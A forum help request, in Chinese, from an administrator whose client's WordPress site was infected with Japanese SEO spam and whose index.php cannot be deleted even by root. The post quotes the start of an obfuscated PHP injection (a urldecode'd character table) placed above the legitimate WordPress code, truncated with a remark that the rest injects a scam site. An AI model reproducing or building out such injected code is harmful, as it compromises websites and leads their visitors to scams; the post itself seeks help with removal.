这让我发疯......这个地方有很多信息,我已经花了相当多的时间但没有成功。我的一位客户的网站受到一些日本 SEO 垃圾邮件的攻击(似乎是 WordPress 网站的已知威胁:https://labs.sucuri.net/signatures/sitecheck/spam-seo/?japanese.0)
我正在使用 Ubuntu 20.04.6 LTS 和最新的 WordPress(所有插件和核心均已更新,还从新下载恢复了核心文件,并安装了 sucuri、iThemes Security 和 Wordfence)
不幸的是,回滚到之前的安全状态是不可能的,因为此后发生了许多交易,而且我们不确定恶意软件何时引入。现在一切似乎都被清理了,除了一件事:index.php 文件。即使使用 root 用户,也无法删除/编辑/执行此文件的任何操作。
[root@site /home/xxxx.com/public_html] # ls -l index.php
-r--r--r-- 1 www www 6982 Apr 13 2022 index.php
[root@site /home/xxxx.com/public_html] # lsattr index.php
--------------e----- ./index.php
[root@site /home/xxxx.com/public_html] # chmod 755 index.php
[root@site /home/xxxx.com/public_html] # ls -l index.php
-r--r--r-- 1 www www 6982 Apr 13 2022 index.php
[root@site /home/xxxx.com/public_html] # rm -f index.php
[root@site /home/xxxx.com/public_html] # ls -l index.php
-r--r--r-- 1 www www 6982 Apr 13 2022 index.php
所以无论我做什么,文件都保持不变。已经验证,它不是符号链接(也不是硬链接),并且内容始终相同:
<?php
$a='fgss332';$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
....
// there's more crap to inject a scamming website here
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
有人知道这里可能发生什么吗?任何帮助将不胜感激! :)